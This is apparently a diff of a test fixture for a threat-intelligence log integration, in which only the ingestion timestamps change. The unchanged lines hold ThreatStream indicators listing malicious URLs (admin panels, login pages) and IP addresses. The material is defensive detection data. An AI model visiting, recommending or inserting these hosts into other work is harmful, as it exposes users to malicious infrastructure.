@@ -21104,7 +21104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025209100Z", + "ingested": "2021-12-14T14:57:43.118348781Z", "original": "{\"created\":\"2020-02-10T02:02:47.096Z\",\"description\":\"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--05509090-9cd9-43b0-892c-02318134a893\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-10T02:02:47.096Z\",\"name\":\"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:47.096Z\"}", "category": "threat", "type": "indicator", @@ -21155,7 +21155,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025212700Z", + "ingested": "2021-12-14T14:57:43.118349316Z", "original": "{\"created\":\"2020-02-10T02:02:55.786Z\",\"description\":\"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c884bffa-1248-483b-bdf8-dada05340ea4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-10T02:02:55.786Z\",\"name\":\"mal_url: http://f0396079.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396079.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:55.786Z\"}", "category": "threat", "type": "indicator", 
@@ -21207,7 +21207,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025217800Z", + "ingested": "2021-12-14T14:57:43.118349757Z", "original": "{\"created\":\"2020-02-10T02:03:03.62Z\",\"description\":\"TS ID: 55303483931; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--14bb6b9e-e4f9-4059-a1a0-f06481441883\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:03.62Z\",\"name\":\"mal_url: http://impulsefittness.info/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://impulsefittness.info/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:03.62Z\"}", "category": "threat", "type": "indicator", @@ -21259,7 +21259,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025223800Z", + "ingested": "2021-12-14T14:57:43.118350265Z", "original": "{\"created\":\"2020-02-10T02:03:53.711Z\",\"description\":\"TS ID: 55303483865; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--92bdd0d7-0d15-4bcb-bf37-6aec2b0114b8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:53.711Z\",\"name\":\"mal_url: http://pentestblog.xyz/csc/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/csc/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:53.711Z\"}", "category": "threat", "type": "indicator", 
@@ -21310,7 +21310,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025230100Z", + "ingested": "2021-12-14T14:57:43.118350759Z", "original": "{\"created\":\"2020-02-10T02:03:57.56Z\",\"description\":\"TS ID: 55303483938; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--eb0c4603-82ac-4283-bda3-ce9d276bc002\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:03:57.56Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:57.56Z\"}", "category": "threat", "type": "indicator", @@ -21361,7 +21361,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025237400Z", + "ingested": "2021-12-14T14:57:43.118351167Z", "original": "{\"created\":\"2020-02-10T02:04:24.419Z\",\"description\":\"TS ID: 55303483870; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--14393248-efcc-4446-9c71-c24b8ea653ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:04:24.419Z\",\"name\":\"mal_url: http://f0396384.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396384.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:24.419Z\"}", "category": "threat", "type": "indicator", 
@@ -21412,7 +21412,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025244500Z", + "ingested": "2021-12-14T14:57:43.118352529Z", "original": "{\"created\":\"2020-02-10T02:04:39.273Z\",\"description\":\"TS ID: 55303483883; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5139b761-30aa-48b8-a7f6-4d125117fd4d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-10T02:04:39.273Z\",\"name\":\"mal_url: http://f0391247.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391247.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:39.273Z\"}", "category": "threat", "type": "indicator", @@ -21464,7 +21464,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025251600Z", + "ingested": "2021-12-14T14:57:43.118353115Z", "original": "{\"created\":\"2020-02-11T02:05:59.738Z\",\"description\":\"TS ID: 55306531291; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--8aed750b-7bc5-41be-956d-5c27ba956957\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:05:59.738Z\",\"name\":\"mal_url: http://borrdrillling.com/benz-forlife/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz-forlife/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:05:59.738Z\"}", "category": "threat", "type": "indicator", 
@@ -21515,7 +21515,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025258800Z", + "ingested": "2021-12-14T14:57:43.118353569Z", "original": "{\"created\":\"2020-02-11T02:06:33.437Z\",\"description\":\"TS ID: 55306531295; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--939b7b32-9004-40e0-8c48-77b9452a0902\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:33.437Z\",\"name\":\"mal_url: http://borrdrillling.com/fox/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/fox/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:33.437Z\"}", "category": "threat", "type": "indicator", @@ -21567,7 +21567,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025266100Z", + "ingested": "2021-12-14T14:57:43.118353958Z", "original": "{\"created\":\"2020-02-11T02:06:48.532Z\",\"description\":\"TS ID: 55306531290; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--f2f9ebc5-814d-4ff2-9979-76264e15d743\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:48.532Z\",\"name\":\"mal_url: http://borrdrillling.com/benz/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:48.532Z\"}", "category": "threat", "type": "indicator", 
@@ -21619,7 +21619,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025273400Z", + "ingested": "2021-12-14T14:57:43.118354417Z", "original": "{\"created\":\"2020-02-11T02:07:49.317Z\",\"description\":\"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.317Z\",\"name\":\"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.317Z\"}", "category": "threat", "type": "indicator", @@ -21671,7 +21671,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025280600Z", + "ingested": "2021-12-14T14:57:43.118355129Z", "original": "{\"created\":\"2020-02-11T02:07:49.341Z\",\"description\":\"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--336d437c-cb0b-473c-b157-3edad63d3a65\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.341Z\",\"name\":\"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.341Z\"}", "category": "threat", "type": "indicator", 
@@ -21723,7 +21723,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025286400Z", + "ingested": "2021-12-14T14:57:43.118355571Z", "original": "{\"created\":\"2020-02-12T02:02:34.926Z\",\"description\":\"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--1fff5727-69fd-4477-a610-3542e53642ae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-12T02:02:34.926Z\",\"name\":\"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:02:34.926Z\"}", "category": "threat", "type": "indicator", @@ -21775,7 +21775,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025293700Z", + "ingested": "2021-12-14T14:57:43.118356003Z", "original": "{\"created\":\"2020-02-12T02:03:19.477Z\",\"description\":\"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime\",\"id\":\"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-02-12T02:03:19.477Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:03:19.477Z\"}", "category": "threat", "type": "indicator", 
@@ -21820,7 +21820,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025301Z", + "ingested": "2021-12-14T14:57:43.118379508Z", "original": "{\"created\":\"2020-02-13T02:02:41.467Z\",\"description\":\"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-13T02:02:41.467Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:41.467Z\"}", "category": "threat", "type": "indicator", @@ -21872,7 +21872,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025308200Z", + "ingested": "2021-12-14T14:57:43.118380434Z", "original": "{\"created\":\"2020-02-13T02:02:52.653Z\",\"description\":\"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--948a3e06-3481-4873-94e7-8ab068284aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-13T02:02:52.653Z\",\"name\":\"mal_url: http://felicombo.club/Zebra/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://felicombo.club/Zebra/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:52.653Z\"}", "category": "threat", "type": "indicator", 
@@ -21924,7 +21924,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025312400Z", + "ingested": "2021-12-14T14:57:43.118380912Z", "original": "{\"created\":\"2020-02-13T02:03:16.624Z\",\"description\":\"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--3b3faeec-4f78-41f2-acd8-13090336f058\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-13T02:03:16.624Z\",\"name\":\"mal_url: http://pdocxoffice.com/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pdocxoffice.com/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:16.624Z\"}", "category": "threat", "type": "indicator", @@ -21976,7 +21976,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025317700Z", + "ingested": "2021-12-14T14:57:43.118381346Z", "original": "{\"created\":\"2020-02-13T02:03:36.577Z\",\"description\":\"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-13T02:03:36.577Z\",\"name\":\"mal_url: http://megaeditores.com/fgv/PHP/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:36.577Z\"}", "category": "threat", "type": "indicator", 
@@ -22028,7 +22028,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025323200Z", + "ingested": "2021-12-14T14:57:43.118381909Z", "original": "{\"created\":\"2020-02-13T02:03:38.86Z\",\"description\":\"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-13T02:03:38.86Z\",\"name\":\"mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/prUjRYcU2rqFpZqv/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:38.86Z\"}", "category": "threat", "type": "indicator", @@ -22079,7 +22079,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025329300Z", + "ingested": "2021-12-14T14:57:43.118382298Z", "original": "{\"created\":\"2020-02-20T04:06:53.787Z\",\"description\":\"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:06:53.787Z\",\"name\":\"mal_url: http://hotlips.top/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hotlips.top/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:06:53.787Z\"}", "category": "threat", "type": "indicator", 
@@ -22130,7 +22130,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025333200Z", + "ingested": "2021-12-14T14:57:43.118382680Z", "original": "{\"created\":\"2020-02-20T04:08:45.548Z\",\"description\":\"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-20T04:08:45.548Z\",\"name\":\"mal_url: http://aflamdirectory.com/wp-content/ip/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.548Z\"}", "category": "threat", "type": "indicator", @@ -22182,7 +22182,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025338600Z", + "ingested": "2021-12-14T14:57:43.118383180Z", "original": "{\"created\":\"2020-02-20T04:08:45.601Z\",\"description\":\"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T04:08:45.601Z\",\"name\":\"mal_url: http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.601Z\"}", "category": "threat", "type": "indicator", 
@@ -22227,7 +22227,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025345900Z", + "ingested": "2021-12-14T14:57:43.118383567Z", "original": "{\"created\":\"2020-02-20T04:09:16.891Z\",\"description\":\"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--6c201663-b1e4-483e-821b-0fe74aecc497\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:09:16.891Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:09:16.891Z\"}", "category": "threat", "type": "indicator", @@ -22279,7 +22279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025350200Z", + "ingested": "2021-12-14T14:57:43.118383965Z", "original": "{\"created\":\"2020-02-20T04:11:00.455Z\",\"description\":\"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8203935f-fb3f-418c-945d-40fca5ef088d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T04:11:00.455Z\",\"name\":\"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:11:00.455Z\"}", "category": "threat", "type": "indicator", 
@@ -22330,7 +22330,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025354800Z", + "ingested": "2021-12-14T14:57:43.118384348Z", "original": "{\"created\":\"2020-02-20T04:28:36.154Z\",\"description\":\"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--238f73e8-938d-4d08-9705-b1b669c129b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-20T04:28:36.154Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.154Z\"}", "category": "threat", "type": "indicator", @@ -22382,7 +22382,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025358300Z", + "ingested": "2021-12-14T14:57:43.118384859Z", "original": "{\"created\":\"2020-02-20T04:28:36.172Z\",\"description\":\"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.172Z\",\"name\":\"mal_url: http://23.247.102.18/4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.172Z\"}", "category": "threat", "type": "indicator", 
@@ -22434,7 +22434,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025363400Z", + "ingested": "2021-12-14T14:57:43.118385310Z", "original": "{\"created\":\"2020-02-20T04:28:36.19Z\",\"description\":\"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.19Z\",\"name\":\"mal_url: http://23.247.102.18/6/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/6/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.19Z\"}", "category": "threat", "type": "indicator", @@ -22485,7 +22485,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025369500Z", + "ingested": "2021-12-14T14:57:43.118385757Z", "original": "{\"created\":\"2020-02-20T04:30:25.248Z\",\"description\":\"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-20T04:30:25.248Z\",\"name\":\"mal_url: http://f0400035.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400035.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:30:25.248Z\"}", "category": "threat", "type": "indicator", 
@@ -22530,7 +22530,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025375900Z", + "ingested": "2021-12-14T14:57:43.118386248Z", "original": "{\"created\":\"2020-02-20T04:31:26.488Z\",\"description\":\"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-20T04:31:26.488Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.488Z\"}", "category": "threat", "type": "indicator", @@ -22582,7 +22582,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025383100Z", + "ingested": "2021-12-14T14:57:43.118386743Z", "original": "{\"created\":\"2020-02-20T04:31:26.532Z\",\"description\":\"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.532Z\",\"name\":\"mal_url: http://23.247.102.18/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.532Z\"}", "category": "threat", "type": "indicator", 
@@ -22634,7 +22634,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025390500Z", + "ingested": "2021-12-14T14:57:43.118387132Z", "original": "{\"created\":\"2020-02-20T04:31:26.582Z\",\"description\":\"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--f43a4d56-b27f-41f0-917b-52358df31e13\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.582Z\",\"name\":\"mal_url: http://23.247.102.18/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.582Z\"}", "category": "threat", "type": "indicator", @@ -22679,7 +22679,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025397800Z", + "ingested": "2021-12-14T14:57:43.118387527Z", "original": "{\"created\":\"2020-02-20T04:32:16.603Z\",\"description\":\"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-41\"],\"modified\":\"2020-02-20T04:32:16.603Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:16.603Z\"}", "category": "threat", "type": "indicator", 
